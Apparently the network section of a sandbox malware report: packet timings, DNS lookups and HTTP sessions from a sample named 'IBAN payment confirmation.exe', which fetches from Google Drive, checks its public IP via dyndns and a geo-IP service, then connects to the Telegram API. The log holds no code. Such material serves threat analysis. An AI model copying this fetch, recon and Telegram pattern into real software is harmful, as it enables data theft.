                                                                                                                            Dec 3, 2024 15:20:15.996421099 CET44349850142.250.181.1192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:15.996618986 CET49850443192.168.2.7142.250.181.1
                                                                                                                            Dec 3, 2024 15:20:16.004441977 CET44349850142.250.181.1192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:16.004523039 CET49850443192.168.2.7142.250.181.1
                                                                                                                            Dec 3, 2024 15:20:16.005791903 CET44349850142.250.181.1192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:16.005851030 CET49850443192.168.2.7142.250.181.1
                                                                                                                            Dec 3, 2024 15:20:16.014734983 CET44349850142.250.181.1192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:16.014837027 CET49850443192.168.2.7142.250.181.1
                                                                                                                            Dec 3, 2024 15:20:16.015372992 CET44349850142.250.181.1192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:16.015440941 CET49850443192.168.2.7142.250.181.1
                                                                                                                            Dec 3, 2024 15:20:16.023602009 CET44349850142.250.181.1192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:16.023660898 CET49850443192.168.2.7142.250.181.1
                                                                                                                            Dec 3, 2024 15:20:16.028273106 CET44349850142.250.181.1192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:16.028351068 CET49850443192.168.2.7142.250.181.1
                                                                                                                            Dec 3, 2024 15:20:16.032397985 CET44349850142.250.181.1192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:16.032458067 CET49850443192.168.2.7142.250.181.1
                                                                                                                            Dec 3, 2024 15:20:16.041783094 CET44349850142.250.181.1192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:16.041851044 CET49850443192.168.2.7142.250.181.1
                                                                                                                            Dec 3, 2024 15:20:16.045248985 CET44349850142.250.181.1192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:16.045308113 CET49850443192.168.2.7142.250.181.1
                                                                                                                            Dec 3, 2024 15:20:16.055201054 CET44349850142.250.181.1192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:16.055247068 CET49850443192.168.2.7142.250.181.1
                                                                                                                            Dec 3, 2024 15:20:16.058274031 CET44349850142.250.181.1192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:16.058346987 CET49850443192.168.2.7142.250.181.1
                                                                                                                            Dec 3, 2024 15:20:16.068911076 CET44349850142.250.181.1192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:16.068968058 CET49850443192.168.2.7142.250.181.1
                                                                                                                            Dec 3, 2024 15:20:16.072041035 CET44349850142.250.181.1192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:16.072089911 CET49850443192.168.2.7142.250.181.1
                                                                                                                            Dec 3, 2024 15:20:16.083297968 CET44349850142.250.181.1192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:16.083359957 CET49850443192.168.2.7142.250.181.1
                                                                                                                            Dec 3, 2024 15:20:16.086692095 CET44349850142.250.181.1192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:16.086747885 CET49850443192.168.2.7142.250.181.1
                                                                                                                            Dec 3, 2024 15:20:16.096215010 CET44349850142.250.181.1192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:16.096287966 CET49850443192.168.2.7142.250.181.1
                                                                                                                            Dec 3, 2024 15:20:16.105180025 CET44349850142.250.181.1192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:16.105251074 CET49850443192.168.2.7142.250.181.1
                                                                                                                            Dec 3, 2024 15:20:16.116189003 CET44349850142.250.181.1192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:16.116245985 CET49850443192.168.2.7142.250.181.1
                                                                                                                            Dec 3, 2024 15:20:16.116293907 CET44349850142.250.181.1192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:16.116338015 CET49850443192.168.2.7142.250.181.1
                                                                                                                            Dec 3, 2024 15:20:16.123539925 CET44349850142.250.181.1192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:16.123606920 CET49850443192.168.2.7142.250.181.1
                                                                                                                            Dec 3, 2024 15:20:16.145397902 CET44349850142.250.181.1192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:16.145462036 CET49850443192.168.2.7142.250.181.1
                                                                                                                            Dec 3, 2024 15:20:16.145534992 CET44349850142.250.181.1192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:16.145580053 CET49850443192.168.2.7142.250.181.1
                                                                                                                            Dec 3, 2024 15:20:16.176351070 CET44349850142.250.181.1192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:16.176469088 CET49850443192.168.2.7142.250.181.1
                                                                                                                            Dec 3, 2024 15:20:16.176485062 CET44349850142.250.181.1192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:16.176536083 CET49850443192.168.2.7142.250.181.1
                                                                                                                            Dec 3, 2024 15:20:16.178570986 CET44349850142.250.181.1192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:16.178628922 CET49850443192.168.2.7142.250.181.1
                                                                                                                            Dec 3, 2024 15:20:16.183356047 CET44349850142.250.181.1192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:16.183408976 CET49850443192.168.2.7142.250.181.1
                                                                                                                            Dec 3, 2024 15:20:16.183588028 CET44349850142.250.181.1192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:16.183629990 CET49850443192.168.2.7142.250.181.1
                                                                                                                            Dec 3, 2024 15:20:16.186542988 CET44349850142.250.181.1192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:16.186625004 CET49850443192.168.2.7142.250.181.1
                                                                                                                            Dec 3, 2024 15:20:16.186660051 CET44349850142.250.181.1192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:16.186709881 CET49850443192.168.2.7142.250.181.1
                                                                                                                            Dec 3, 2024 15:20:16.198472023 CET44349850142.250.181.1192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:16.198529959 CET49850443192.168.2.7142.250.181.1
                                                                                                                            Dec 3, 2024 15:20:16.198635101 CET44349850142.250.181.1192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:16.198678017 CET49850443192.168.2.7142.250.181.1
                                                                                                                            Dec 3, 2024 15:20:16.198688030 CET44349850142.250.181.1192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:16.198730946 CET49850443192.168.2.7142.250.181.1
                                                                                                                            Dec 3, 2024 15:20:16.209045887 CET44349850142.250.181.1192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:16.209105015 CET49850443192.168.2.7142.250.181.1
                                                                                                                            Dec 3, 2024 15:20:16.209289074 CET44349850142.250.181.1192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:16.209333897 CET49850443192.168.2.7142.250.181.1
                                                                                                                            Dec 3, 2024 15:20:16.219990969 CET44349850142.250.181.1192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:16.220163107 CET49850443192.168.2.7142.250.181.1
                                                                                                                            Dec 3, 2024 15:20:16.220181942 CET44349850142.250.181.1192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:16.220222950 CET49850443192.168.2.7142.250.181.1
                                                                                                                            Dec 3, 2024 15:20:16.229932070 CET44349850142.250.181.1192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:16.230030060 CET49850443192.168.2.7142.250.181.1
                                                                                                                            Dec 3, 2024 15:20:16.230093956 CET44349850142.250.181.1192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:16.230165005 CET49850443192.168.2.7142.250.181.1
                                                                                                                            Dec 3, 2024 15:20:16.240149021 CET44349850142.250.181.1192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:16.240221977 CET49850443192.168.2.7142.250.181.1
                                                                                                                            Dec 3, 2024 15:20:16.240328074 CET44349850142.250.181.1192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:16.240372896 CET49850443192.168.2.7142.250.181.1
                                                                                                                            Dec 3, 2024 15:20:16.250508070 CET44349850142.250.181.1192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:16.250574112 CET49850443192.168.2.7142.250.181.1
                                                                                                                            Dec 3, 2024 15:20:16.250659943 CET44349850142.250.181.1192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:16.250705957 CET49850443192.168.2.7142.250.181.1
                                                                                                                            Dec 3, 2024 15:20:16.260258913 CET44349850142.250.181.1192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:16.260344028 CET49850443192.168.2.7142.250.181.1
                                                                                                                            Dec 3, 2024 15:20:16.260375023 CET44349850142.250.181.1192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:16.260413885 CET49850443192.168.2.7142.250.181.1
                                                                                                                            Dec 3, 2024 15:20:16.270427942 CET44349850142.250.181.1192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:16.270493984 CET49850443192.168.2.7142.250.181.1
                                                                                                                            Dec 3, 2024 15:20:16.270649910 CET44349850142.250.181.1192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:16.270690918 CET49850443192.168.2.7142.250.181.1
                                                                                                                            Dec 3, 2024 15:20:16.280601025 CET44349850142.250.181.1192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:16.280781031 CET49850443192.168.2.7142.250.181.1
                                                                                                                            Dec 3, 2024 15:20:16.281192064 CET44349850142.250.181.1192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:16.281244040 CET49850443192.168.2.7142.250.181.1
                                                                                                                            Dec 3, 2024 15:20:16.290050983 CET44349850142.250.181.1192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:16.290101051 CET49850443192.168.2.7142.250.181.1
                                                                                                                            Dec 3, 2024 15:20:16.290236950 CET44349850142.250.181.1192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:16.290282011 CET49850443192.168.2.7142.250.181.1
                                                                                                                            Dec 3, 2024 15:20:16.299141884 CET44349850142.250.181.1192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:16.299206972 CET49850443192.168.2.7142.250.181.1
                                                                                                                            Dec 3, 2024 15:20:16.299401999 CET44349850142.250.181.1192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:16.299446106 CET49850443192.168.2.7142.250.181.1
                                                                                                                            Dec 3, 2024 15:20:16.309334993 CET44349850142.250.181.1192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:16.309407949 CET49850443192.168.2.7142.250.181.1
                                                                                                                            Dec 3, 2024 15:20:16.309417963 CET44349850142.250.181.1192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:16.309463024 CET49850443192.168.2.7142.250.181.1
                                                                                                                            Dec 3, 2024 15:20:16.317121029 CET44349850142.250.181.1192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:16.317229986 CET49850443192.168.2.7142.250.181.1
                                                                                                                            Dec 3, 2024 15:20:16.317238092 CET44349850142.250.181.1192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:16.317285061 CET49850443192.168.2.7142.250.181.1
                                                                                                                            Dec 3, 2024 15:20:16.317972898 CET44349850142.250.181.1192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:16.318026066 CET49850443192.168.2.7142.250.181.1
                                                                                                                            Dec 3, 2024 15:20:16.318077087 CET49850443192.168.2.7142.250.181.1
                                                                                                                            Dec 3, 2024 15:20:16.318113089 CET44349850142.250.181.1192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:16.318161964 CET49850443192.168.2.7142.250.181.1
                                                                                                                            Dec 3, 2024 15:20:16.939457893 CET4986280192.168.2.7132.226.247.73
                                                                                                                            Dec 3, 2024 15:20:17.063390970 CET8049862132.226.247.73192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:17.063541889 CET4986280192.168.2.7132.226.247.73
                                                                                                                            Dec 3, 2024 15:20:17.064028025 CET4986280192.168.2.7132.226.247.73
                                                                                                                            Dec 3, 2024 15:20:17.184056044 CET8049862132.226.247.73192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:24.118107080 CET8049862132.226.247.73192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:24.122697115 CET4986280192.168.2.7132.226.247.73
                                                                                                                            Dec 3, 2024 15:20:24.243370056 CET8049862132.226.247.73192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:26.556296110 CET8049862132.226.247.73192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:26.610764980 CET4986280192.168.2.7132.226.247.73
                                                                                                                            Dec 3, 2024 15:20:27.016796112 CET49886443192.168.2.7104.21.67.152
                                                                                                                            Dec 3, 2024 15:20:27.016849995 CET44349886104.21.67.152192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:27.017010927 CET49886443192.168.2.7104.21.67.152
                                                                                                                            Dec 3, 2024 15:20:27.019627094 CET49886443192.168.2.7104.21.67.152
                                                                                                                            Dec 3, 2024 15:20:27.019642115 CET44349886104.21.67.152192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:28.282742977 CET44349886104.21.67.152192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:28.282818079 CET49886443192.168.2.7104.21.67.152
                                                                                                                            Dec 3, 2024 15:20:28.311359882 CET49886443192.168.2.7104.21.67.152
                                                                                                                            Dec 3, 2024 15:20:28.311392069 CET44349886104.21.67.152192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:28.311865091 CET44349886104.21.67.152192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:28.349675894 CET49886443192.168.2.7104.21.67.152
                                                                                                                            Dec 3, 2024 15:20:28.395339966 CET44349886104.21.67.152192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:28.751121998 CET44349886104.21.67.152192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:28.751182079 CET44349886104.21.67.152192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:28.751220942 CET49886443192.168.2.7104.21.67.152
                                                                                                                            Dec 3, 2024 15:20:28.757916927 CET49886443192.168.2.7104.21.67.152
                                                                                                                            Dec 3, 2024 15:20:34.342398882 CET4986280192.168.2.7132.226.247.73
                                                                                                                            Dec 3, 2024 15:20:34.462685108 CET8049862132.226.247.73192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:34.775563002 CET8049862132.226.247.73192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:34.829535961 CET4986280192.168.2.7132.226.247.73
                                                                                                                            Dec 3, 2024 15:20:34.918885946 CET49903443192.168.2.7149.154.167.220
                                                                                                                            Dec 3, 2024 15:20:34.918942928 CET44349903149.154.167.220192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:34.919023991 CET49903443192.168.2.7149.154.167.220
                                                                                                                            Dec 3, 2024 15:20:34.919565916 CET49903443192.168.2.7149.154.167.220
                                                                                                                            Dec 3, 2024 15:20:34.919576883 CET44349903149.154.167.220192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:36.349878073 CET44349903149.154.167.220192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:36.350012064 CET49903443192.168.2.7149.154.167.220
                                                                                                                            Dec 3, 2024 15:20:36.351985931 CET49903443192.168.2.7149.154.167.220
                                                                                                                            Dec 3, 2024 15:20:36.352008104 CET44349903149.154.167.220192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:36.352258921 CET44349903149.154.167.220192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:36.353740931 CET49903443192.168.2.7149.154.167.220
                                                                                                                            Dec 3, 2024 15:20:36.399343967 CET44349903149.154.167.220192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:36.399590015 CET49903443192.168.2.7149.154.167.220
                                                                                                                            Dec 3, 2024 15:20:36.399610996 CET44349903149.154.167.220192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:36.970879078 CET44349903149.154.167.220192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:36.970971107 CET44349903149.154.167.220192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:36.971143961 CET49903443192.168.2.7149.154.167.220
                                                                                                                            Dec 3, 2024 15:20:36.975738049 CET49903443192.168.2.7149.154.167.220
                                                                                                                            Dec 3, 2024 15:20:37.127192974 CET4986280192.168.2.7132.226.247.73
                                                                                                                            Dec 3, 2024 15:20:37.128339052 CET4990980192.168.2.7132.226.247.73
                                                                                                                            Dec 3, 2024 15:20:37.248030901 CET8049862132.226.247.73192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:37.248126030 CET4986280192.168.2.7132.226.247.73
                                                                                                                            Dec 3, 2024 15:20:37.248703003 CET8049909132.226.247.73192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:37.248892069 CET4990980192.168.2.7132.226.247.73
                                                                                                                            Dec 3, 2024 15:20:37.248975992 CET4990980192.168.2.7132.226.247.73
                                                                                                                            Dec 3, 2024 15:20:37.370374918 CET8049909132.226.247.73192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:38.604399920 CET8049909132.226.247.73192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:38.605995893 CET49913443192.168.2.7149.154.167.220
                                                                                                                            Dec 3, 2024 15:20:38.606038094 CET44349913149.154.167.220192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:38.606112957 CET49913443192.168.2.7149.154.167.220
                                                                                                                            Dec 3, 2024 15:20:38.606797934 CET49913443192.168.2.7149.154.167.220
                                                                                                                            Dec 3, 2024 15:20:38.606812000 CET44349913149.154.167.220192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:38.657701015 CET4990980192.168.2.7132.226.247.73
                                                                                                                            Dec 3, 2024 15:20:40.013942957 CET44349913149.154.167.220192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:40.015677929 CET49913443192.168.2.7149.154.167.220
                                                                                                                            Dec 3, 2024 15:20:40.015698910 CET44349913149.154.167.220192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:40.015758038 CET49913443192.168.2.7149.154.167.220
                                                                                                                            Dec 3, 2024 15:20:40.015767097 CET44349913149.154.167.220192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:40.631561995 CET44349913149.154.167.220192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:40.631644964 CET44349913149.154.167.220192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:40.631719112 CET49913443192.168.2.7149.154.167.220
                                                                                                                            Dec 3, 2024 15:20:40.632333994 CET49913443192.168.2.7149.154.167.220
                                                                                                                            Dec 3, 2024 15:20:40.636028051 CET4990980192.168.2.7132.226.247.73
                                                                                                                            Dec 3, 2024 15:20:40.637398958 CET4991980192.168.2.7132.226.247.73
                                                                                                                            Dec 3, 2024 15:20:40.756484032 CET8049909132.226.247.73192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:40.756606102 CET4990980192.168.2.7132.226.247.73
                                                                                                                            Dec 3, 2024 15:20:40.757989883 CET8049919132.226.247.73192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:40.758080006 CET4991980192.168.2.7132.226.247.73
                                                                                                                            Dec 3, 2024 15:20:40.758305073 CET4991980192.168.2.7132.226.247.73
                                                                                                                            Dec 3, 2024 15:20:40.878261089 CET8049919132.226.247.73192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:43.170118093 CET8049919132.226.247.73192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:43.171426058 CET49926443192.168.2.7149.154.167.220
                                                                                                                            Dec 3, 2024 15:20:43.171456099 CET44349926149.154.167.220192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:43.171514034 CET49926443192.168.2.7149.154.167.220
                                                                                                                            Dec 3, 2024 15:20:43.171797991 CET49926443192.168.2.7149.154.167.220
                                                                                                                            Dec 3, 2024 15:20:43.171807051 CET44349926149.154.167.220192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:43.220295906 CET4991980192.168.2.7132.226.247.73
                                                                                                                            Dec 3, 2024 15:20:44.581855059 CET44349926149.154.167.220192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:44.583678961 CET49926443192.168.2.7149.154.167.220
                                                                                                                            Dec 3, 2024 15:20:44.583709002 CET44349926149.154.167.220192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:44.583782911 CET49926443192.168.2.7149.154.167.220
                                                                                                                            Dec 3, 2024 15:20:44.583792925 CET44349926149.154.167.220192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:45.275460005 CET44349926149.154.167.220192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:45.275594950 CET44349926149.154.167.220192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:45.275644064 CET49926443192.168.2.7149.154.167.220
                                                                                                                            Dec 3, 2024 15:20:45.276063919 CET49926443192.168.2.7149.154.167.220
                                                                                                                            Dec 3, 2024 15:20:45.311460018 CET4993180192.168.2.7132.226.247.73
                                                                                                                            Dec 3, 2024 15:20:45.431442976 CET8049931132.226.247.73192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:45.431642056 CET4993180192.168.2.7132.226.247.73
                                                                                                                            Dec 3, 2024 15:20:45.431863070 CET4993180192.168.2.7132.226.247.73
                                                                                                                            Dec 3, 2024 15:20:45.551961899 CET8049931132.226.247.73192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:46.783482075 CET8049931132.226.247.73192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:46.785463095 CET49935443192.168.2.7149.154.167.220
                                                                                                                            Dec 3, 2024 15:20:46.785509109 CET44349935149.154.167.220192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:46.785594940 CET49935443192.168.2.7149.154.167.220
                                                                                                                            Dec 3, 2024 15:20:46.785860062 CET49935443192.168.2.7149.154.167.220
                                                                                                                            Dec 3, 2024 15:20:46.785872936 CET44349935149.154.167.220192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:46.829576969 CET4993180192.168.2.7132.226.247.73
                                                                                                                            Dec 3, 2024 15:20:48.198936939 CET44349935149.154.167.220192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:48.201019049 CET49935443192.168.2.7149.154.167.220
                                                                                                                            Dec 3, 2024 15:20:48.201067924 CET44349935149.154.167.220192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:48.201133966 CET49935443192.168.2.7149.154.167.220
                                                                                                                            Dec 3, 2024 15:20:48.201145887 CET44349935149.154.167.220192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:48.795911074 CET44349935149.154.167.220192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:48.795999050 CET44349935149.154.167.220192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:48.796046972 CET49935443192.168.2.7149.154.167.220
                                                                                                                            Dec 3, 2024 15:20:51.526201010 CET49935443192.168.2.7149.154.167.220
                                                                                                                            Dec 3, 2024 15:20:51.529107094 CET4993180192.168.2.7132.226.247.73
                                                                                                                            Dec 3, 2024 15:20:51.529587984 CET4994680192.168.2.7132.226.247.73
                                                                                                                            Dec 3, 2024 15:20:51.649926901 CET8049946132.226.247.73192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:51.649996996 CET8049931132.226.247.73192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:51.650088072 CET4993180192.168.2.7132.226.247.73
                                                                                                                            Dec 3, 2024 15:20:51.650093079 CET4994680192.168.2.7132.226.247.73
                                                                                                                            Dec 3, 2024 15:20:51.650223970 CET4994680192.168.2.7132.226.247.73
                                                                                                                            Dec 3, 2024 15:20:51.770172119 CET8049946132.226.247.73192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:53.140886068 CET8049946132.226.247.73192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:53.188946962 CET4994680192.168.2.7132.226.247.73
                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                            Dec 3, 2024 15:20:08.306763887 CET6166553192.168.2.71.1.1.1
                                                                                                                            Dec 3, 2024 15:20:08.444418907 CET53616651.1.1.1192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:11.204166889 CET5268053192.168.2.71.1.1.1
                                                                                                                            Dec 3, 2024 15:20:11.341629982 CET53526801.1.1.1192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:16.794493914 CET5058053192.168.2.71.1.1.1
                                                                                                                            Dec 3, 2024 15:20:16.934154034 CET53505801.1.1.1192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:26.867862940 CET5849853192.168.2.71.1.1.1
                                                                                                                            Dec 3, 2024 15:20:27.015923977 CET53584981.1.1.1192.168.2.7
                                                                                                                            Dec 3, 2024 15:20:34.780443907 CET5881153192.168.2.71.1.1.1
                                                                                                                            Dec 3, 2024 15:20:34.917860031 CET53588111.1.1.1192.168.2.7
                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                            Dec 3, 2024 15:20:08.306763887 CET192.168.2.71.1.1.10x86edStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                                            Dec 3, 2024 15:20:11.204166889 CET192.168.2.71.1.1.10x23dcStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                                            Dec 3, 2024 15:20:16.794493914 CET192.168.2.71.1.1.10xccaStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                            Dec 3, 2024 15:20:26.867862940 CET192.168.2.71.1.1.10xc4f8Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                            Dec 3, 2024 15:20:34.780443907 CET192.168.2.71.1.1.10x5a21Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                            Dec 3, 2024 15:20:08.444418907 CET1.1.1.1192.168.2.70x86edNo error (0)drive.google.com172.217.19.174A (IP address)IN (0x0001)false
                                                                                                                            Dec 3, 2024 15:20:11.341629982 CET1.1.1.1192.168.2.70x23dcNo error (0)drive.usercontent.google.com142.250.181.1A (IP address)IN (0x0001)false
                                                                                                                            Dec 3, 2024 15:20:16.934154034 CET1.1.1.1192.168.2.70xccaNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Dec 3, 2024 15:20:16.934154034 CET1.1.1.1192.168.2.70xccaNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                            Dec 3, 2024 15:20:16.934154034 CET1.1.1.1192.168.2.70xccaNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                            Dec 3, 2024 15:20:16.934154034 CET1.1.1.1192.168.2.70xccaNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                            Dec 3, 2024 15:20:16.934154034 CET1.1.1.1192.168.2.70xccaNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                            Dec 3, 2024 15:20:16.934154034 CET1.1.1.1192.168.2.70xccaNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                            Dec 3, 2024 15:20:27.015923977 CET1.1.1.1192.168.2.70xc4f8No error (0)reallyfreegeoip.org104.21.67.152A (IP address)IN (0x0001)false
                                                                                                                            Dec 3, 2024 15:20:27.015923977 CET1.1.1.1192.168.2.70xc4f8No error (0)reallyfreegeoip.org172.67.177.134A (IP address)IN (0x0001)false
                                                                                                                            Dec 3, 2024 15:20:34.917860031 CET1.1.1.1192.168.2.70x5a21No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                            • drive.google.com
                                                                                                                            • drive.usercontent.google.com
                                                                                                                            • reallyfreegeoip.org
                                                                                                                            • api.telegram.org
                                                                                                                            • checkip.dyndns.org
                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            0192.168.2.749862132.226.247.73803824C:\Users\user\Desktop\IBAN payment confirmation.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Dec 3, 2024 15:20:17.064028025 CET151OUTGET / HTTP/1.1
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                            Host: checkip.dyndns.org
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Dec 3, 2024 15:20:24.118107080 CET321INHTTP/1.1 200 OK
                                                                                                                            Date: Tue, 03 Dec 2024 14:20:23 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 104
                                                                                                                            Connection: keep-alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            X-Request-ID: 1d526d361158763cd3347ce3bbd3bb3a
                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>
                                                                                                                            Dec 3, 2024 15:20:24.122697115 CET127OUTGET / HTTP/1.1
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                            Host: checkip.dyndns.org
                                                                                                                            Dec 3, 2024 15:20:26.556296110 CET321INHTTP/1.1 200 OK
                                                                                                                            Date: Tue, 03 Dec 2024 14:20:26 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 104
                                                                                                                            Connection: keep-alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            X-Request-ID: 262c315f1822201dace6daee57d6821d
